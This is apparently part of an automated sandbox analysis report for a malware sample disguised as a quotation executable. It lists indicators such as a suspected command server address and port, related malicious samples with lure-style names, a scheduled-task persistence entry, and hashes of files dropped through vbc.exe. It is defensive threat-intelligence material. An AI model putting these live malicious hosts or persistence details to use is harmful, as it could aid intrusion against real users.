                                                        • Excluded IPs from analysis (whitelisted): 104.26.12.31, 172.67.75.172, 104.26.13.31
                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        Time | Type | Description
                                                        14:42:54 | Task Scheduler | Run new task: Nafifas path: "C:\Users\user\AppData\Roaming\Data\Data.exe"
                                                        14:43:15 | API Interceptor | 175x Sleep call for process: vbc.exe modified
                                                        Match | Associated Sample Name / URL | Detection | Context
                                                        185.222.58.90 | SecuriteInfo.com.Variant.MSILHeracles.37401.28222.exe | malicious | 185.222.58.90:17910/
                                                        185.222.58.90 | RFQ - FYKS - 06052022.exe | malicious | 185.222.58.90:17910/
                                                        185.222.58.90 | MACHINE SPECIFICATIONS.exe | malicious | 185.222.58.90:17910/
                                                        185.222.58.90 | MACHINE SPECIFICATIONS.exe | malicious | 185.222.58.90:17910/
                                                        No context
                                                        Match | Associated Sample Name / URL | Detection | Context
                                                        ROOTLAYERNETNL | vbc.exe | malicious | 185.222.57.197
                                                        ROOTLAYERNETNL | SOA.exe | malicious | 185.222.57.146
                                                        ROOTLAYERNETNL | 0123987INMWN2987.js | malicious | 45.137.22.152
                                                        ROOTLAYERNETNL | L4aghbwCQr54nW4.exe | malicious | 45.137.22.152
                                                        ROOTLAYERNETNL | Order Enquiry.exe | malicious | 185.222.57.173
                                                        ROOTLAYERNETNL | Quotation.exe | malicious | 45.137.22.40
                                                        ROOTLAYERNETNL | CCMWZuN3YWHECys.exe | malicious | 45.137.22.152
                                                        ROOTLAYERNETNL | SecuriteInfo.com.Trojan005944781.27289.exe | malicious | 185.222.57.197
                                                        ROOTLAYERNETNL | vqalfhePHx.exe | malicious | 45.137.22.237
                                                        ROOTLAYERNETNL | PyS0mctVfI.exe | malicious | 45.137.22.237
                                                        ROOTLAYERNETNL | Yeni sipari#U015f _No.129099, pdf.exe | malicious | 185.222.57.197
                                                        ROOTLAYERNETNL | ldzOp71fAH.exe | malicious | 185.222.57.197
                                                        ROOTLAYERNETNL | INV198763.js | malicious | 45.137.22.152
                                                        ROOTLAYERNETNL | LR7AKSMQhc.exe | malicious | 45.137.22.237
                                                        ROOTLAYERNETNL | Quotation.exe | malicious | 45.137.22.40
                                                        ROOTLAYERNETNL | INVZ678765340.js | malicious | 45.137.22.72
                                                        ROOTLAYERNETNL | Bestellung -20162022 _June 2022,pdf.exe | malicious | 185.222.57.197
                                                        ROOTLAYERNETNL | Updated PI.exe | malicious | 185.222.57.146
                                                        ROOTLAYERNETNL | iOW5Sp6ul4.exe | malicious | 185.222.57.197
                                                        ROOTLAYERNETNL | rNgmoGJFYX.exe | malicious | 185.222.57.91
                                                        No context
                                                        No context
                                                        Process:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):520
                                                        Entropy (8bit):5.345981753770044
                                                        Encrypted:false
                                                        SSDEEP:12:Q3La/KDLI4MWuPk21rkvoDLI4MWuCOKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks29E4KnKDE4KhK3VZ9pKhk
                                                        MD5:CB16F02E4CEFD4F305114A67B4865184
                                                        SHA1:7A481FAE100B554EB754816608A7776954863CFF
                                                        SHA-256:0428AA69397DC9399FEBFB4293F8FD06202C8A3C2E9B3F841EBA2DE87DB9FC25
                                                        SHA-512:1F96226886924B2F33578AB5F2B1306A77925FB86AC05615565C3F4EF7D93DB40F9ADD05CDA7F5435DEF58D1FEA1A33473EDDDAFFB0AF8161E73BC7CDBEAEF47
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                        Process:C:\Users\user\Desktop\QUOTATION 061622.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):520
                                                        Entropy (8bit):5.345981753770044
                                                        Encrypted:false
                                                        SSDEEP:12:Q3La/KDLI4MWuPk21rkvoDLI4MWuCOKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks29E4KnKDE4KhK3VZ9pKhk
                                                        MD5:CB16F02E4CEFD4F305114A67B4865184
                                                        SHA1:7A481FAE100B554EB754816608A7776954863CFF
                                                        SHA-256:0428AA69397DC9399FEBFB4293F8FD06202C8A3C2E9B3F841EBA2DE87DB9FC25
                                                        SHA-512:1F96226886924B2F33578AB5F2B1306A77925FB86AC05615565C3F4EF7D93DB40F9ADD05CDA7F5435DEF58D1FEA1A33473EDDDAFFB0AF8161E73BC7CDBEAEF47
                                                        Malicious:true
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):2502
                                                        Entropy (8bit):5.3347050065951125
                                                        Encrypted:false
                                                        SSDEEP:48:MOfHK5HKXAHKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHAHDJHjHKoLK:vq5qXAqdqslqzJYqhQnoPtIxHbqLqo6d
                                                        MD5:44A99103902115000FEE31833EEF1EC7
                                                        SHA1:8A5D9F44EEDDB720DA442547F396ED61378DC5CF
                                                        SHA-256:E1CDCE73432C1A13E0C2C29AA9DD3282DC9C6CC07262AEFEFBC0BC0BF13A7039
                                                        SHA-512:89C217C56022C88F94B813A81E83800B9D5D4779364E1E40D3C892100AEBAC9ACA75F9E767B6C003D88399A462830FE6973F7D611595ADFAAEBE8D39723A37F0
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.698618937757839
                                                        Encrypted:false
                                                        SSDEEP:12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
                                                        MD5:FBFB8162B9366F7135B54193D54C2094
                                                        SHA1:9F7291EB4E117104EE4215B83F38C18607438B02
                                                        SHA-256:D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
                                                        SHA-512:452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.698304057893793
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                        MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                        SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                        SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                        SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.698304057893793
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                        MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                        SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                        SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                        SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.695977454005895
                                                        Encrypted:false
                                                        SSDEEP:24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
                                                        MD5:E0510B4427516C1D89AAD3659D680C3D
                                                        SHA1:1992D34F6239D80EB43BA39F3222BF0785E5D1F4
                                                        SHA-256:556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
                                                        SHA-512:35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.698304057893793
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                        MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                        SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                        SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                        SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.695977454005895
                                                        Encrypted:false
                                                        SSDEEP:24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
                                                        MD5:E0510B4427516C1D89AAD3659D680C3D
                                                        SHA1:1992D34F6239D80EB43BA39F3222BF0785E5D1F4
                                                        SHA-256:556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
                                                        SHA-512:35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.698304057893793
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                        MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                        SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
